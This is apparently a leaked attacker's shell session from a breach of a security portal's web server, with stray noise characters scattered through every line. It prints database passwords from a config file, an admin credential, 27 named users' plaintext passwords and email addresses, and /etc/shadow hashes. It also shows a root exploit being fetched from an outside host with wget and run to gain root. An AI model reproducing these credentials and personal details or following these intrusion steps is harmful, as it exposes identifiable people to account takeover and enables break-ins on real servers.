; ]% k$ O9 q Z4 g! \drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
* H9 ~( [9 C& J' L* L& r* O- V9 Kdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
P+ h; x0 B* z1 S2 ^* ydrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql' ?7 w4 g) Z4 [/ X4 b. K
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
4 f4 }, M* ~$ P+ A" tdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
* |5 w( x3 `( W/ E* U/ Tdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
- k0 F$ j5 f+ g0 m-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
5 P$ \8 e) U5 P( K/ w9 a; Ndrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config9 f: _" T2 }! |, w ^1 h, ]
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
0 \" t/ h6 Y. H3 O5 m6 j/ Wdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
0 A- j: o8 }; K, d* o( b+ Z-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
0 v6 X3 Z0 {. a3 g) v5 G: X& x-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
5 y) g' y% }6 A, G0 h# k% Ndrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
! ?* q# {. u1 C& [7 a+ n. @0 D: udrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
9 {& j2 X4 ~. ?( j3 S# x, d+ v-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
; n* i- u9 I' h; u-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
7 V% l; P" `6 R; D/ J-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
3 a, ?9 H* y, k' S5 U-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
; Q2 ]8 ` _1 N" G1 ]8 p- _! G: ?-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php ?7 k% y6 b# X' ]% V
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
O9 N' W! w5 ]! S0 E7 Q+ D5 l7 y- @-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf/ s0 T$ T9 e1 u1 D0 n7 E
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
2 h: W" V2 }; d; x, tdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang6 M# z- ?! ~7 ^9 ^7 z8 g( @7 Z
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib: G+ Q& i6 ]/ `1 J- I
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
. Q9 ?: P4 ?8 ^0 X! K" udrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
! [5 t( Y. W, Z: idrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata. |4 R! Q7 Y# ^
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new6 b/ R, G" A9 C9 I* o
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf- k6 z2 u/ ^6 h
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
+ ^( T6 O3 P6 J& y2 V2 V+ }-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
( M: |2 c( J- B8 B6 y% i% I O) sdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss1 c, R! C) c H! E& J G; o
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources* R4 K: v; e5 D, v, a4 i( S
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
2 a5 ^- i9 Y: m- t0 Ydrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
2 M* o! r6 c/ u. udrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
* \- q6 B/ G& ^' M9 i1 B$ xdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
6 ?+ D9 e5 K: \. Ldrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v28 x% Q6 M, A% M4 |
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
" G+ E4 _3 N5 r" e0 K2 ?-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
/ ]+ |% @7 G# udrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki% U8 I- B3 t5 m, r; F4 Q3 _
" F% z1 p" w* Z5 i* B, `8 O
sh-3.2$ head -20 index.php" { \7 H/ n# r/ K- a" p/ D
<?PHP: S! k$ V7 a. a2 c. b+ t; @0 }$ i: {
/**4 R0 b9 p" P& [" l# c& w0 g
* Mainfile (external) for astalavistaNET v2.0
% x/ ^+ {4 Z7 ~1 Q0 r$ U*$ T9 [ b) g8 G) U5 e. [9 A0 x
* @copyright Astalavista IT Engineering GmbH
% B& B. m; K* c8 R4 [5 u" Y* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>3 L; y! ]; G: Z. @$ O2 w/ [6 p# O
* @version 1.0
1 r0 X/ v. {1 W*// H# S6 F7 o( X7 _- x4 j
1 `) D4 @1 u# M if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {5 R b Q' R- }- J7 y# P
$dontStartSession = false;
; J1 d$ d( E9 i7 r; K } else {9 R; I" i$ F# j J$ \' z. W2 [
$dontStartSession = true;9 \# J$ E# x4 v1 T; ? n* p1 {
}
2 E. @8 V$ Y% k. H require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
A2 y: p$ h K$ A# J( m! U require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
1 }9 c3 V3 m/ m; B) V require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);& y9 d: ^1 g& }& w6 x- `
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
8 @0 @, y$ v( D- o" ~1 N; t
6 N! R d% S o a+ ~sh-3.2$ cd config
) I: r% R E1 f5 osh-3.2$ ls -la
, |8 K. \. s% X o9 ~ {( Dtotal 32
# ~/ b/ m; \/ l# z9 {8 y, K0 @drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .! I2 y# U9 S; w& x; ~3 k: U
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
" l3 B$ Y8 t; Y8 H-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php6 W; y* K1 _8 A {! }, O M" t
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php9 p2 s1 L- E$ O- |+ w) q' g
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
! ?. }* x" i- m' S _' ^3 s7 l+ O9 n1 ?-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
9 P7 f0 J) l! k- m" B4 d/ {$ Y-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
% B9 x s& w0 v+ j( M# z, t8 c1 C
sh-3.2$ cat com.conf.php& t; K7 C( T9 b# `+ f& L0 g0 P
[snip]
) `' X4 _1 o: j1 H//member-database
$ m4 g$ |. Z# T+ @) P$_CONFIG['db_mem_server'] = ‘localhost’;4 C# I# _1 e# ^ g$ T K' Q3 L* ?
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;& h! |& y1 E; A4 y# J W0 ~
$_CONFIG['db_mem_user'] = ‘astanet_db’;$ b$ r. {# \6 i: i4 o
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;: o4 ?( x1 c1 {5 V7 P
$_CONFIG['db_mem_debug'] = false; //true or false
5 X# e# I7 ^8 E8 i8 Q/ a8 e//ads-database8 x# ?+ ^* z; n* r
$_CONFIG['db_ads_server'] = ‘localhost’;
7 V, r; b7 o/ C/ w- D% Y3 e9 j$_CONFIG['db_ads_database'] = ‘astanet_ads’;
6 F+ I2 K. `* i8 l$_CONFIG['db_ads_user'] = ‘astanet_db’;
5 Q% Z2 ^* w3 ~$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;* \" Q. I# P4 R4 K' u
$_CONFIG['db_ads_debug'] = false; //true or false {5 |, d2 A. H8 M! P4 L0 ]
//rainbow-database' i3 V/ u) H R+ T* x0 o4 q! ?
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
2 |; g% r/ e1 H; Q" L$_CONFIG['db_rainbow_database'] = ‘rainbow’;
0 I* B+ ~+ d& ~; C: F$ X2 R$_CONFIG['db_rainbow_user'] = ‘dinu’;0 T0 O5 N: ~ f c& l# [: \1 v R
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;8 |) P' P* z5 x# A. t) }! T* ]
$_CONFIG['db_rainbow_debug'] = false; //true or false& O, [' x- h$ i4 m8 ?. Z$ a
//mailing lists database
1 L! c9 J& H$ G2 K" X$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
3 p. e- I! v0 w( B5 p4 {$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;3 \ `& e u" C2 U( G7 r5 C- E
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
! `2 n3 W3 K) I* c; N+ t$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
8 l- [/ f' T l& N; _" D$_CONFIG['db_mailing_lists_debug'] = false; //true or false
8 a! Q( Z1 s8 \: X5 n; r- [2 V//paypal
, k7 c' ^ _9 x, Q2 {7 D, q3 O' U$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;9 A1 Z+ _3 f- X d a) u6 C- `# u- e
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
) ~' a: @' d9 K$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;4 b5 `0 P9 G I+ P x
$_CONFIG['sub_pp_noship'] = ‘1′;
: ]4 {1 x# r+ P- D$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;# l/ X1 S9 T& z# S
[snip]
7 J! a0 c9 Z) M1 L
! x; f/ F( f+ q( Y6 ksh-3.2$ cd ..+ E+ M" g. I8 A9 R5 S. f
sh-3.2$ cd member
4 t- ]* e) J+ i0 y3 Tsh-3.2$ ls -la
q, |( _" U. ^/ @" w: d) h/ s7 Btotal 20( X, F6 e4 s0 V" d7 s
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
0 r) L4 b0 D" t( i8 E7 tdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, L: u& R+ {* S& ~-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess7 L( W& N. r4 v6 r5 N* e
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php* @/ k& h7 X4 z% Q" a
sh-3.2$ cat .htaccess
# V" u8 Z+ P6 o! \- ]7 hSecFilterEngine off7 y8 S$ H8 f- P# `! P. Y' Z
: W- X- R$ B- G7 \' N Q0 h
sh-3.2$ cd ..9 j4 ?: R5 `! C, X; F( I
sh-3.2$ cd cron
) q# M3 |# x( W; X7 F+ jsh-3.2$ ls -la" P+ r& t# e$ ?; g D# X. D
total 168
+ ?7 E; c0 `2 S3 T0 E0 l1 Idrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .# }- ]' J# N9 X; ?. J6 p/ ?" D
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..1 L; T* T7 k8 J0 ]& X; P
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
9 W% p) k" U' F+ D( k-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php: |7 l, @( |/ [
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php4 H& W3 j3 V0 v; a* k3 Q
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
' }) \+ X6 Q' E# |7 Q y-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php2 p& m/ b* ~2 Z: s
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php9 S5 |# e. A K- S0 ^
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php$ V6 h/ f, \6 @* j9 N( O
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php6 M/ }: A7 _+ J( G
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh$ ~& K; G8 b$ f, \
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
2 G; z& p! E: a( L) {/ k' k4 e& e-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php* `7 {' N& d; ~1 ~
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php9 B9 D5 x# D, K" G$ c$ U' W
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
6 B1 d+ o/ Q$ {0 R/ @/ U! w-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php( q8 Z8 L$ i; L/ m
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php, Z+ J- C- t/ K x
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
; j! F' ~0 @. E# @-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php! a& t e0 }& @
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php6 i# w, g# `$ v! J* Q
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
2 b' c: E5 D8 Q) V-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
) x' K# F% |8 `* F8 g-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
! N; ? \$ O/ |$ a8 m9 G0 X% J( F9 O& x# C7 p7 L& \0 L
sh-3.2$ cd ..# r$ c5 O; X) @- Z# ~, Q) m
sh-3.2$ cd _007; z( h; J8 U+ B( |" B8 d8 ^
sh-3.2$ ls -la
* d) }) Y/ F' {- l9 z3 Y( ztotal 24+ e' e8 T& q! z' G/ M: V5 [& c( t
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
$ C6 A; m2 L8 u# ?6 pdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..& ^3 y2 k: B5 f& ^( V. O& W
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
4 t7 T0 \# }- k+ e7 g# d- X9 W-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
0 a0 J! Q4 I. Z7 I-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php$ V- D/ z/ y9 r& t" {5 `; w9 R7 z6 R
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap" |4 Z. R, E' ^8 i; c9 N# a
2 F% w: h5 z7 z2 ~, H) I
sh-3.2$ cat .htaccess
9 [( B, I' m( d8 @authType Basic8 }8 r' l6 F% P" V0 V- d
authName Admin
8 c0 Z" K* Z1 I# K2 PauthUserFile /home/astanet/auth/.htadm_pwd
7 R, V: @9 m$ z0 H7 Prequire valid-user" ^7 X6 U5 @8 I1 E. d
s0 o3 ^. h: D4 i/ o
sh-3.2$ cat /home/astanet/auth/.htadm_pwd& A. H5 Q4 `5 @* U" U
admin2net:CR0bl65MwhfT
( {9 ]. r% a! @- ]5 d( f/ Z! Z4 z, l5 \0 Y# K: J' s9 v
sh-3.2$ mysql -u astanet_db -p
! t0 c& e" H+ Y) S4 k w+ z' E# D4 aEnter password:
% @3 Q; n+ \( b9 N' u# lWelcome to the MySQL monitor. Commands end with ; or \g.
8 R, H5 J9 |" p3 Y! sYour MySQL connection id is 275153
0 G( Q4 }" f) ?' a) I( FServer version: 5.0.45-community-log MySQL Community Edition (GPL)5 ]8 Y0 g# M& D/ P( t3 F0 w
8 b5 i: F& `, z0 T T6 l) ~# |Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer." h4 w5 _# @0 I5 D+ V
2 O7 x( ~# `# R8 @/ w3 G& k
mysql> show databases; L1 P+ R% _8 f6 N1 O& P
+———————–+% A. _8 V( J7 ~4 w% m" w3 ^# a
| Database |& x0 d0 V0 m$ @
+———————–+
* H- Z5 K# z+ D8 k, U# i% S| information_schema |
' }9 _4 m' `+ O1 ?9 T| astanet_ads |/ R& g" Q _) }$ w+ _$ R
| astanet_mailing_lists |8 ~1 G( Y! W; Y' j
| astanet_mediawiki |
- `8 w4 ^: t F: Q1 z+ d| astanet_membersystem |
1 y: \% i5 \+ X# |8 l| test |6 f+ w0 T9 U" k+ ?) {( U! s/ Z( Y. A
+———————–+
7 w4 t4 i( F$ y0 J6 rows in set (0.00 sec)
. M7 I/ E( Z* J0 k
3 P/ x/ C( i% h, [/ bmysql> use astanet_membersystem
' p; V3 X+ ^5 wDatabase changed" ]8 X1 v, R& Y
mysql> show tables;( t% M/ _4 h7 Y# H% d G4 [" }
+———————————–+3 n& v$ L5 L0 | X5 J+ R
| Tables_in_astanet_membersystem |7 b' |7 A% e$ l/ }- }
+———————————–+! h/ [/ h+ ^" X7 R; G, p' \
| blacklist_categories |4 U$ P( ?5 I" ^: q" ?
| blacklist_content |
( F9 H; V; @4 X# _- k9 P" X| blacklist_levels |3 a& N) I7 K% Q
| blacklist_mcset |2 Z) b% N3 z( C- P. Y' {
| dir_categories |# u$ j: u% |" E5 L$ x
| dir_comments |
* `. q1 N0 @; R/ ~) U| dir_links |
2 e: j2 E7 B9 o| dir_temp |
: G; @2 q+ Z1 w. ?| dir_votes |3 m. f1 q* u4 |# u' w/ `
| documents |, i4 C8 S+ D/ J7 f$ b
| documents_categories |
# \! v* f$ K5 K+ s6 `| email_content |
4 c) J/ u. _( _' v+ e: a+ g| email_settings |
2 Y: J2 x7 d& B" a| exploits |6 A* G- t1 v# r! H2 @
| exploits_categories |1 q, v' o+ t) R0 B) c5 v
| exploittree_categories |
3 @$ a6 p. p" Z& b/ S, u| exploittree_exploits |
- g D) z2 @( ], U+ i R9 P| home_values |1 U" A. C* |' w) J7 A. ?) r
| iso_countries |
1 F$ | x: ?3 L! C| links_categories |
' s/ s8 A5 S5 \% H% T4 _/ T- F| links_records |$ G/ o4 M6 u* B% O' N7 [& |
| links_unauth | H) k3 ]4 x: {7 B: p
| links_votes |
) _2 W" U( M4 f6 Q| log |
u1 h5 c* G3 p* Y, E* N$ o9 S| news_categories |
% g9 v5 o% d/ f| news_comments |
! w7 r' j4 u" W8 F2 o' ^| news_emoticons |; }% ]: a5 U% D2 A6 _5 a" Z
| news_latest |
# }6 C: |3 O/ i' `% M3 X9 b: V| news_messages |
5 i5 K# U% z) W| news_statistics |* P: ^* Y1 p9 @. l8 _! L
| news_votes |
9 i) U: [1 \$ F. a' u| prices_content |# z( g6 | H" `* P6 ~
| prices_offers |3 K( O% v) Y$ K/ g- B+ d
| rss_settings |
+ c* ~2 M2 C# U% x* @* s3 E| sessions |3 G8 g- W2 s5 x" T5 n% E; {/ z
| stats_signups |- O7 t( L" W% e
| u2u2 |2 M; I* Y1 ?# A- G
| u2u_contact |& u7 ]( s+ B; U% e
| u2u_settings |' \/ L) c" t9 D# f" n2 }/ k
| user_keywords_selected_categories |) C% l' T1 S# Q+ r/ u0 e! H3 t6 O2 Z
| users |
: R0 C% Z* N/ O| users_ipn_test |* }! M4 h& \5 V. Y: d, O" D
| users_keyword_values |
/ F1 a( ~& J. l0 b| users_profile |4 U3 A, m4 q9 I
| users_temp |
% j5 L3 c. D( h* k( s| users_upgrade |
- Y7 I* t) S8 N0 p9 b6 f+———————————–+
+ z4 N! z: I [, n5 q) ] }0 ?46 rows in set (0.00 sec)( Q0 M) Q3 {+ I% F6 E( j) \8 b1 z0 B
- m# k# z( `% J6 B o, C
mysql> describe users;
. e8 L; c3 p) u+————————–+————————————–+——+—–+———————+—————-+
$ z9 B6 t- N$ p1 O! c6 y V4 `| Field | Type | Null | Key | Default | Extra |
! i: u0 u$ Y( I$ }+ t, l4 Z+————————–+————————————–+——+—–+———————+—————-+
' g" |5 \6 R+ p4 M4 l| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |$ B+ J! ]' L+ x' U
| user | varchar(50) | NO | | | |
8 J- i% h7 {; w! i3 q| nickname | varchar(30) | NO | MUL | anonymous | |
* F4 \; m& g. D| password | varchar(30) | NO | | | |# [% x/ W5 a, J& p) y
| userlevel | tinyint(3) | YES | MUL | NULL | |
( H5 y' s2 r& y| exp | int(8) unsigned | NO | | 0 | |8 `& L. U! Z; R& Y. l
| email | varchar(50) | NO | | | |
! k+ t7 [+ H1 B| ip | varchar(15) | NO | | 0 | |
( Q4 f$ Z. n9 f| proxy | set(’0′,’1′) | NO | | 0 | |5 o% @9 [9 w4 R/ v
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |" e9 r H1 D9 G" h, _
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
$ Q% b3 |1 C6 f2 i| anz_in | tinyint(1) | NO | | -1 | | Q' O" N; ?6 |+ O. r0 k
| status | tinyint(1) unsigned | NO | | 0 | |
$ M: s: L' u4 D| checked | set(’0′,’1′,’2′) | NO | | 0 | |7 k+ s- [: E9 m- m' Q! ~
| freemember | set(’0′,’1′) | NO | | 0 | |* y. ]" |- n6 D# v
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
1 x3 \; z( e! A- b) s| lang | tinytext | NO | | | |- }8 ~: U* o3 @) ^
| adid | smallint(6) | NO | | 0 | |
1 H4 N' z4 L4 P| pp_txn_id | varchar(255) | YES | | NULL | |
7 ~; u* B' @) x8 K. `1 M| cnb_transaction_id | varchar(255) | YES | | NULL | |
* a+ }' n9 D& K2 T( x$ {2 j1 R& X| cnb_order_id | varchar(255) | YES | | NULL | |2 b/ v- z6 [: B8 F
| cnb_user_id | int(11) | YES | | 0 | |9 a* k' j% U" Y5 |" M
+————————–+————————————–+——+—–+———————+—————-+. c- a1 S: N7 V& C3 q
22 rows in set (0.01 sec) |! f3 J \6 L8 e% F0 f8 Y
7 C p3 f% g8 h# n2 ymysql> select count(*) as skids from users;
# S: r! F# i0 s2 [) j+ V+ f$ x5 L+——-+) V7 p- S, t+ r; f+ Z# j
| skids |
. u) o5 T/ a4 j5 P0 a* t& z9 d+——-+$ Q% Q, r) y& ~9 l! l
| 25199 |
: X8 k4 n% S/ Q! B1 i. X( Z$ ?+——-+
5 X, p) a4 @6 ]& U" s9 u1 row in set (0.00 sec)
/ a8 b2 [- N1 B9 @% p: x1 j. T6 l3 i! |1 L
mysql> select user,nickname,password,email from users where userlevel = 1;
1 ?7 R3 L& f- O. l& M+————————–+———————-+——————+———————————–+/ n8 ^4 L; j- T* ~5 v
| user | nickname | password | email |$ y( ^2 V' K( y
+————————–+———————-+——————+———————————–+
t( }; q/ i3 G; m% V) U& W| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
+ t, N3 ^3 ?) d! B& p| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
3 }) W( V* O1 g| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |/ j, z, k1 |! ?
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net | ^) S/ t3 m* E
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
% w( r4 B* b0 j% C| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
$ N6 i$ M) J- \9 {" V- e0 W| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
. E2 J8 O6 d) [2 T| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
% J' } ~3 C2 x- k4 ~| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |& M+ Y, H' q8 w9 t7 q3 g
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com | s0 i: i% ]/ U# R5 S. q$ R% b; A
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
$ }0 O; u' E2 _) t; h: o$ A| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |9 R7 u& ?5 J& f- \# n
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |3 W; b, @1 A- D+ W' F8 k! T
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
* u* d% n8 O- {% O3 t v5 q+ ?| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
$ D, A" a- \$ }1 O( b% X| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |9 y N* E6 w* l0 N& ~ B* y
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
* ~1 E4 E& C. w" H& z* Y| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |" I5 l z# l# p/ L) P0 I9 {' s8 T; x
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
" T/ ?7 o) m) u7 Z1 l| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
, {1 x0 N1 |* ` c* D| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
& L; E5 E8 z( A% w& Q9 w) k| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |& y6 M7 K, Y" d9 ^" @- k8 H
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
7 z- s! W1 a) {( f: N" r& @| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
- N5 ?1 Z' z3 e4 t& t6 f) {| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |; s' k( m0 V1 e0 D2 @
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
# Y% H x# x' Z. S, ^; Y: M| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |& h9 G6 c, K: ]8 C a
+————————–+———————-+——————+———————————–+9 P8 \" M) e' d3 ]
27 rows in set (0.00 sec), x8 O# B* q a1 S+ u$ {. {
; u. N* i. J$ k; y- `$ ?! \/ }3 a
mysql> exit;$ @1 b( ?9 R: s; S
Bye Z; m0 }/ [- s# b, H
0 p0 W2 h3 G) _3 V# S
[~] plaintext passwords? yes," l) _0 ?& @5 A$ d8 Q, R% s
Those so called “security professionals” who charge you $6.66 / month to7 y- M3 b% q# g6 {
register at their hack-proof portal, save your passwords in plaintext…4 \7 g& h1 i1 ?( U. S( k# e: N* y
brilliant!9 i7 A& X7 I C, Y$ ^ P1 {
$ `4 E3 Q- E% W3 u: D
[~] This been fun but we want more.- r! V4 z( a. ]3 I- S+ s& g
! N; J% m5 i" ush-3.2$ uname -a1 ]) Z% U, y3 S- `0 K( j6 `6 g( s
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux6 h+ ~( P, q/ v2 v% s
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]' V# F' s; ~6 O, L
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
& L$ J! c5 U6 I- @3 R4 F5 FResolving anti.sec.labs… 13.33.33.37/ c6 b' u7 Y& Q' a& \
Connecting to anti.sec.labs|13.33.33.37|:80… connected.1 M7 `4 B- X2 s0 L1 ~
HTTP request sent, awaiting response… 200 OK" \5 X5 E1 r0 M h! [; S Y0 r
Length: 18200 (18K) [text/plain]6 ~3 n3 ~" H% t3 ]5 z
Saving to: `g0troot’" t, e' c k9 l* `3 y
1 P2 P4 m3 n" ?7 {
100%[=========================================================================================================================================>] 18,200 58.6K/s in
. E3 g! ^- r `1 }7 z; x0.3s
: [+ Z& M0 r% W- m+ _ ]. B
/ ^, [3 G7 u, g" d/ c8 L18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
# I& s9 ?$ `& S* ?9 v% u0 @
: x% e3 h; W6 lsh-3.2$ ./g0troot -i x86_64
7 B& ~5 ]. X. \' c8 T[+] g0troot - anti.sec.labs1 J' }+ G. X# q5 f$ O$ n
[+] Target: 2.6.18-128.1.10.el5& e' f; ^7 B4 ^1 o O! d( q
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
: O7 w" \ ^5 Y/ o
4 M, O( ]5 P5 ?2 ?. Y[+] r00tr00t) w3 T" A& @- t1 }
[~] Executing shell…9 G4 B/ Z6 K; r3 Y
3 Y0 J( g' V9 c q
sh-3.2# id
9 k! \( v* N+ e" Yuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
$ |: I# H6 j. ^7 ^8 m
8 c0 d+ N( Y0 n0 D" q/ U9 |& c" B" p1 xsh-3.2# cat /etc/shadow
9 \3 G& ^" d" l& q3 ]9 r- W4 g! uroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
! }* S: V0 ^! |1 Z, c[snip]( W' P3 H1 o7 G, {
admin 1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
